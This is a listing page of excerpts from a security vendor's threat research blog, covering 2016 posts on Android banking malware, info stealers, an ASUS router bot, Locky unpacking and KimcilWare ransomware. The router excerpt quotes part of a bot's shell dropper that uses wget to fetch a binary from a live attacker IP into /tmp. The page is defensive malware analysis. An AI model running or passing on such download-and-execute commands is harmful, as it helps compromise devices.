threat research | Page 2


New variants of android banking malware target even more German banks, popular social media apps, and more Summary In my previous blog I provided a detailed analysis of a new android banking malware that spoofed the mobile applications of several large German banks to trick users into revealing their banking credentials. This week I found several new variants of this growing malware, and in this update I am sharing these new findings. Install the malware One of these variants masquerades as another German mobile banking app. Once installed,... [Read More]
by RSS Kai Lu  |  Nov 18, 2016  |  Filed in: Security Research
Summary We recently found an Android banking malware masquerading as an email app that targets several large German banks. This banking malware is designed to steal login credentials from 15 different mobile banking apps for German banks. It also has the ability to resist anti-virus mobile apps, as well as hinder 30 different anti-virus programs and prevent them from launching. Install the malware The malware masquerades as an email app. Once installed, its icon appears in the launcher, as shown below. Figure 1. Malware App Icon   Figure... [Read More]
by RSS Kai Lu  |  Nov 18, 2016  |  Filed in: Security Research
Following our research on Cyperine 2.0 and Next Man History Stealer, the malware author rebranded their info stealer as Medusa. While it basically has the same featurse as Cyperine, you now need a valid account to access the builder. The example below compares Cyperine on the left and Medusa on the right, which shows a user logged in as Deadzeye. Figure 01. Builder comparison between Cyperine (Left) and Medusa (Right) The builder signatures clearly show that both of these variants were made by the same author, who goes by the name... [Read More]
by RSS David Maciejak and Rommel Joven  |  Nov 10, 2016  |  Filed in: Security Research
In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year.  In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured through Wireshark. Figure 1 Exploitation of CVE-2014-9583 Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod... [Read More]
by RSS Bing Liu  |  Oct 20, 2016  |  Filed in: Security Research
My personal favorite talk was on exploiting Pebble smartwatches ("Exploit Millions of Pebble Smartwatches for Fun and Profit" by Zhang and Wei). Our expectations are usually higher in one's own field of expertise, but this one is really great work. Pebble smartwatch talk at VB 2016 Basically, the authors found an inner assembly routine in Pebble's operating system which allows to elevate one's privileges. If you are familiar with ROP, this is a privilege elevation gadget. Normally, this routine is called by Pebble... [Read More]
by RSS Axelle Apvrille  |  Oct 14, 2016  |  Filed in: Industry Trends & News
We’re into the final quarter of the year, and the cyberthreat landscape continues to be interesting. This week in the Fortinet Threat Intelligence Brief we looked at a number of interesting trends around IoT botnets, continued ransomware problems – both through directed attacks and infected websites, and the spoofing of the Navy Federal US Credit Union. One interesting thing to note is how attacks tend to move from target to target and region to region in waves. This week, for example, we saw a 4X spike in attempts to deliver... [Read More]
by RSS Bill McGee  |  Oct 07, 2016  |  Filed in: Industry Trends & News
Over the last few months we saw that Locky’s loader uses seed parameter to execute properly. This method was probably used to prevent sandboxing, since it will not execute without the correct parameter. Afterwards, we saw Locky shift itself from an EXE to Dynamic Link Library (DLL). We recently encountered yet another Locky development, where binary strains are using the Nullsoft installer package as its loader. In this post we will delve into how to unpack the final binary payload from its Nullsoft package loader. Decompressing Locky’s... [Read More]
by RSS ​​​​​​​Floser Bacurio Jr. and Kenny Yongjian Yang  |  Sep 12, 2016  |  Filed in: Security Research
Fortinet’s FortiGuard Labs cybersecurity threat report takes a look at the nature of attacks – how attackers get in, how they manage to persist inside networks, what they want, and who they are. It also provides insight into three key areas of concern that our FortiGuard Labs team has identified, and they bear reviewing here. 2016 Rio Olympics: Cyberattacks during the Olympic games are not new. We have seen a spike of attacks focused on the Olympics – including targeting vendors and spectators – beginning as far back as the... [Read More]
by RSS Ladi Adefala  |  Aug 01, 2016  |  Filed in: Industry Trends & News
  Cyperine is a VB .NET info stealing malware advertised in hacking forums to retrieve information from victims and sends it to whichever email is entered in the builder. Cyperine version 1.0 was first released in December 2014, and on June 14, 2016 version 2.0 was released. It steals SSFN steam’s authentication files, stored passwords from browsers, user logins, and software product keys installed in the victim’s computer.   Figure 01. Cyperine builder   The seller also provides a skype account for... [Read More]
by RSS Rommel Joven and David Maciejak  |  Jul 07, 2016  |  Filed in: Security Research
A new ransomware targeting Magento Websites was recently discovered by the Malware Hunter Team and Lawrence Abrams. This post intends to share additional findings of the FortiGuard Lion Team, specifically on three areas: 1) KimcilWare’s backdoor capabilities; 2) how can we decrypt files encrypted by KimcilWare and 3) the hacker group who may be behind it. KimcilWare Backdoor Aside from encrypting files, KimcilWare is capable of opening backdoor as well as uploading files to affected sites. The following KimcilWare code snippet shows... [Read More]
by RSS Tien Phan and Roland Dela Paz  |  Apr 01, 2016  |  Filed in: Security Research